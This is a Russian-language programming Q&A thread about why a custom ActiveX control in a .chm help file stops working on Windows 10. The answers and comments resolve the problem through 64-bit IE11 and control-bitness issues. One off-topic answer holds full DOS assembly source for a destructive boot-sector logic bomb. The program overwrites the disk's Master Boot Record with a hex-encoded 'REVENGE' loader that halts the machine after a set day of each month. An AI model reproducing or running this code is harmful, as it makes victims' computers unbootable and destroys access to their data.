# ActiveX раньше и сейчас

Tags: windows, visual-c++, mfc, activex, chm

У меня был COM, использовал в chm (html help), прекрасно работал в Windows XP, но потом... Вопрос такой: не отказалась ли Microsoft от них сейчас? Конкретно в Windows 10 x64. Я пытался исправить свой код, чтобы он продолжал запускаться из старых .chm, но получаю ошибку времени выполнения типа "не найдено". Интересует без особых на то причин, код всего лишь удобен для меня, это запуск по контексту файлов через shell. Если уж очень интересно, можно [посмотреть](http://amsawa.narod.ru/data/soft/waters.chm) на .chm. Чтобы вызвать код можно нажать на иконку с компакт диском.

Comment: вроде ie нужно. на восьмерке может запуститься, на десятке попробуй поставить ie

Comment: Да уже в висте не работало. А цеэйчэм используют какую то версию интернет эксплорера не связанную с установленными в ос. Что тем более удивляет в том плане, почему же тогда старый эктив икс перестал вызываться. Ведь я пытался перекомпилировать в студии 2017, даже x64 вариант делал, безрезультатно. Раз проект mfc для этого ещё есть, значит кое как поддерживается, хотя вот в дот нете нет эктив икс, вместо этого новая технология, осталась лишь поддержка COM.

Comment: И да, цеэйчэм это упакованные хатемеэль, испытывал работу своей программы во множестве современных браузеров, не работает. Что то с ос связанное.

Comment: Поставьте зеленую галочку на правильном ответе, или дополните вопрос так, что б было понятно что вопрос всё ещё требует ещё другого ответа.

Answer (score 3):

Никто, разумеется, не отказывается от COM и ActiveX. Большая часть современных компонентов Windows, начиная от DirectShow и заканчивая WinRT/UWP, основана именно на COM. Сама идея "отказа" от него абсурдна, это означало бы возврат во времена до Windows 95. ActiveX, конечно, сейчас не очень актуален, но от него также никто не отказывается. Например, ActiveX-элемент Windows Media Player вполне работает в IE11:

```
<object id="mediaplayer" classid="clsid:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#version=5,1,52,701" standby="please wait..." type="application/x-oleobject" width="640" height="480">
<param name="filename" value="./video.avi">
</object>
```

В приложениях Windows Forms, по моим тестам, ActiveX-элементы тоже работают.

Другое дело, что сам Internet Explorer, который используется средством просмотра chm, действительно несколько устарел, а современные браузеры уже не поддерживают встраивание ActiveX в HTML. Поэтому я бы сильно не рассчитывал на эту технологию при разработке чего-то серьезного. Если вам нужно встраивать в HTML какой-то сложный функционал, изучайте API для разработки расширений под конкретные браузерные движки.

Что касается вашего chm-файла, я попробовал его открыть, но у меня ничего не работает ни в Windows 10, ни в XP. Кнопки со скрипичным ключом не появляется. Есть кнопка "download", которая ведет на страницу 404 системы Ucoz. Если залезть в код, в файле master.js видно, что он пытается создать экземпляр объекта COM-класса с CLSID 8739CB66-6D75-11D4-B8CF-8DD84C2C1547, которого у меня в системе нету. Вероятно, для его работы нужно установить некий "Thy Active X control" с вашего сайта, однако ссылка на его скачивание также ведет на страницу 404. В общем, нужно больше информации...

---

По итогам обсуждения в комментариях:

1. Поскольку в 64-разрядных системах 64-разрядный Internet Explorer, на них необходимо развертывать 64-разрядную версию ActiveX-элемента.
2. DLL с ActiveX-элементом не нужно развертывать в системный каталог. Если же по какой-то причине необходимо развертывать именно в системный, убедитесь, что ее не блокирует антивирус и что вы развертываете в правильную папку на x64 ОС: System32 для 64-разрядных DLL, SysWow64 - для 32-разрядных.

Comment: Уточните, браузеры больше не поддерживают Active-X? Ведь Вы же сами про wmp в ie11 пишите. Дело в том, что у меня моя программа не работает не только в chm, но и в браузерах. Что касается проблем с моими файлами, их надо скачивать с сайта и смотреть с локала, а не в сети, про uCoz при мне не упоминайте, сайт был создан на народе, передан яндексу, а теперь...

Comment: @SawaAkisawa Я имел в виду, что другие браузеры, кроме IE, не поддерживают ActiveX. Собственно, они и раньше его не поддерживали, за исключением старых версий FireFox.

Comment: Точно! И как я это забыл, старый дурак? Надо попробовать в этом самом, как его, который вместо ie в десятке.

Comment: Спасибо за сказанное о том, что ссылка битая на моём сайте. Вот контрол http://amsawa.narod.ru/data/soft/thy.OCX.rar, распакуйте и установите с помощью inf-файла.

Comment: @SawaAkisawa в XP работает из-под IE (в CHM у меня вообще ни одна страница не открывается). По крайней мере, выводит ошибку "не найден mp3 файл". В 10 не работает, так как IE 64-битный, а ваш контрол 32-битный. Впрочем, если единственное его назначение - воспроизведение аудио, особого смысла в нем нет, так это же можно реализовать через WMP или стандартный функционал HTML5.

Comment: @SawaAkisawa А Edge также их не поддерживает. Он, к слову, не поддерживает и более новые технологии, вроде Silverlight и браузерного WPF.

Comment: У Вас chm не открываются наверное потому, что скачаны из сети, ос не разрешает. Я тут недавно выяснил, что если назвать папку с chm <any>.chm, то в десятке та же проблема, говорит, что они скачаны из сети  (а они не скачаны) и заставить открыть их невозможно. То есть тупая десятка реагирует на такое расширение имени папки. Чудеса! У меня сейчас ie не стоит, только edge, думаете, при просмотре chm используется именно он? Дело в том, что я и x64 ActiveX тестировал, не работает! Что касается идеи этого контрола, то ноу-хау в поддержании распределённых данных.

Comment: То есть, если вставить, например, компакт диск с mp3 или loosless названными определённым образом, то они обнаружатся и запустятся.

Comment: @SawaAkisawa Да, вы правы, разблокировка файла решает проблему с CHM. " *У меня сейчас ie не стоит, только edge, думаете, при просмотре chm используется именно он?*" просмотрщик chm определенно использует IE, обращение к ieframe.dll четко видно в Process Explorer. Возможно у вас вырезан IE как программа, но не библиотеки его движка, иначе бы вообще ничего не открывалось.

Comment: "*Дело в том, что я и x64 ActiveX тестировал, не работает!*" а как именно не работает? Контрол в системе не регистрируется? Или регистрируется, но выдает ошибку при использовании? Я боюсь, вам придется вернуть в систему полноценный IE, и отлаживать, пользуясь его инструментами разработчика. Иначе можно только гадать, что происходит.

Comment: Контрол регистрируется, но при кликаньи на иконке для обращения к нему выдаётся что то вроде "не найден". Там разные вариации сообщений об ошибках были, точно уже не помню, но смысл этот. Попробую по Вашему совету установить ie, можно десятый? Всё же у меня не проходит подозрение, html help workshop использует не системный ie, который у меня сейчас x64, а что то своё. Честно говоря, я тогда запутался в возможных вариантах того, что надо проверить. Одно точно, под XP x86 всё работает.

Comment: Я ведь даже пробовал написать контрол просто с алертом, так вот на нескольких проверенных вариантах он так и не обнаружился, chm не пробовал, только ie x64 и два варианта разрядности контрола.

Comment: Ещё же варианты появляются с установкой контрола. Я испытывал установку только в папку SYSTEM32, может это причина?

Comment: @SawaAkisawa Если у вас уже есть IE 11 (он является встроенным компонентом Windows 10), то ничего устанавливать не надо. Все равно 32-разрядный IE11 никак не установить на x64 ОС. IE10 тоже не получится установить. Да, вам нужно иметь две копии контрола для каждой разрядности, это единственный способ.

Comment: "*Я испытывал установку только в папку SYSTEM32, может это причина*" - возможно, особенно если вы устанавливаете скажем  32-разрядный в System32 или наоборот, 64-разрядный в SysWow64. Или антивирус блокирует подозрительный файл в системном каталоге. Попробуйте для начала не в системном каталоге регистрировать.

Comment: Заработало! И под ie11, и в chm. Спасибо большое. Осталось с реестром разобраться, и обновлю программу установки на своём сайте.

Comment: Как и ожидалось, разбираюсь с реестром. С Win64 разобрался, только что помог здесь одному. Теперь бы с Win32 разобраться, почему то не авторизируется даже под администратором, не поможете? И еще одна просьба (не могу создавать новые темы из за умников, не въезжающих в то, что я на этом форуме пишу), у контрола порядка килобайта memory leaks, не могу разобраться, забыл, как. Раньше вроде профайлером можно было.

Comment: @SawaAkisawa Давайте хотя бы в чате https://chat.stackexchange.com/rooms/26298/c-c , а то длинные обсуждения в комментариях тоже не приветствуются.

Answer (score 1):

Microsoft давно начал отход от ActiveX и COM в целом, о чем они, собственно, [писали](https://blogs.windows.com/msedgedev/2015/05/06/a-break-from-the-past-part-2-saying-goodbye-to-activex-vbscript-attachevent/). Во-первых, они сейчас фокусируются на более высокоуровневых технологиях, прежде всего .NET. Во-вторых, сам по себе COM вышел не очень удачным (по моему мнению). Слишком переусложнен, неудобен в использовании, и не вполне надежен. Это прежде всего из личного опыта использования локальных out-of-proc COM серверов. Полный отказ от COM технологий в проектах очень благотворно сказался на надежности. Так что будущего у COM, и особенно ActiveX, нет. Но умирать они будут долго, слишком много кода написано.

Comment: Так можно использовать Active X в chm под Windows 10?

Comment: @Sawa Akisawa, почему же нельзя, можно. Она выдает предупреждение UAC при запуске, так и семерка его тоже выдает (если система с апдейтами, оригинальная семерка ничего не пишет). Насколько я понял, в вашем .chm проблема с javascript, а не с ActiveX как таковым.

Comment: Сейчас нет под рукой кода. Посоветуйте пожалуйста, это новый вопрос создавать по вызову Active X из javascript или можно здесь? (И почему пропадает Ваше имя после собаки, которое я вставляю?)

Comment: @Sawa Akisawa, лучше новый вопрос наверное, тем более я помочь ничем не смогу. Я работал с COM в общем, конкретно с ActiveX мой опыт практически нулевой. А мое имя пропадает потому что оно тут не нужно - я и так получаю оповещения о комментариях к своему ответу.

Comment: Подумал. Javascript раньше работал, я его не менял. Дело не в нём.

Comment: @Sawa Akisawa, так он и сейчас прекрасно работает, например, в Windows 7 без патчей. Javascript не изменился, а вот интерпретатор Javascript в Windows 10 совсем другой (насколько я знаю). Тут еще вопрос какой движок использует .chm - IE или Edge. Попробуйте распаковать .chm и посмотрите как он работает в виде html.

Comment: Пробовал. В разных браузерах. Безрезультатно. И в семёрке пробовал. И даже в висте. Только в XP всё продолжает работать.

Comment: Какой ActiveX умирать? Он используется в Richedit, Clipboard, OLE, Shell-меню, и даже в  DOT NET движок умудрились засунуть, плюс взаимодействие с классами (рефлексия) прошита нитками ActiveX

Comment: @nick_n_a, не надо понимать так уж буквально. Естественно, он оттуда никуда не денется. Но вот что-то новое вряд ли будет появляться.

Answer (score 0):

```
;******************************************************************
;*                                                                *
;*  Rewrite MBR: orig=>revenge (halt after X day of month)        *
;*                                                                *
;*                                                                *
;******************************************************************
.model TINY
.CODE
.286

org 100h

start:
     pushf
     pusha
     push ds
     push es

     mov ax,cs
     mov ds,ax
     mov es,ax

     mov dx,80h;                      ; read original MBR
     mov cx,1;
     mov ax,0201h;
     mov bx, offset buff
     int 13h;

     mov di,offset buff               ; change program
     mov si,offset MBR
     cld
     mov cx,offset buff-offset MBR
     rep movsb

     inc cx;                          ; write MBR
     mov ax,0301h;
     int 13h;

     pop es
     pop ds
     popa
     popf

     mov ax,4c00h                     ; exit
     int 21h


; 10-12-95 08:33pm
; Version 1.0
; Master Boot Record: REVENGE
; after MDAY each month
; CodeLenght this programm must be less than 238 byte !
; byte [24h]=MDAY (18H)

MBR db 0FAh,02Bh,0C0h,08Eh,0D0h,08Eh,0C0h,08Eh,0D8h,0BCh,000h,07Ch,0FBh,08Bh,0F4h,0BFh
    db 000h,07Eh,0B9h,000h,001h,0FCh,0F3h,0A5h,0E9h,000h,002h,0B0h,007h,0E6h,070h,0EBh
    db 000h,0E4h,071h,03Ch, 018h, 07Fh,024h,0B9h,004h,000h,0BEh,0EEh,07Fh,0F6h,004h,080h
    db 074h,014h,0F6h,044h,004h,004h,074h,00Eh,08Bh,014h,08Bh,04Ch,002h,0E8h,013h,000h
    db 059h,0EAh,000h,07Ch,000h,000h,083h,0EEh,010h,0E2h,0E2h,0BEh,072h,07Eh,0E8h,017h
    db 000h,0EBh,0FEh,0BBh,000h,07Ch,0BDh,005h,000h,0B8h,001h,002h,0CDh,013h,073h,007h
    db 02Bh,0C0h,0CDh,013h,04Dh,075h,0F2h,0C3h,0B4h,00Eh,0ACh,0CDh,010h,00Ah,0C0h,075h
    db 0F9h,0C3h,053h,074h,061h,072h,074h,069h,06Eh,067h,020h,04Dh,053h,02Dh,044h,04Fh
    db 053h,02Eh,02Eh,02Eh,00Dh,00Ah,000

buff db 516 dup (?)

END start
```

Comment: это вообще к чему? 16-битная программа-загрузчик и вопрос про active-x - как-то не вяжутся. Если вы хотите дополнить ваш вопрос - нажмите кнопку редактировать.

Comment: @nick_n_a, да не нашёл ту тему, где про ассемблер, простите.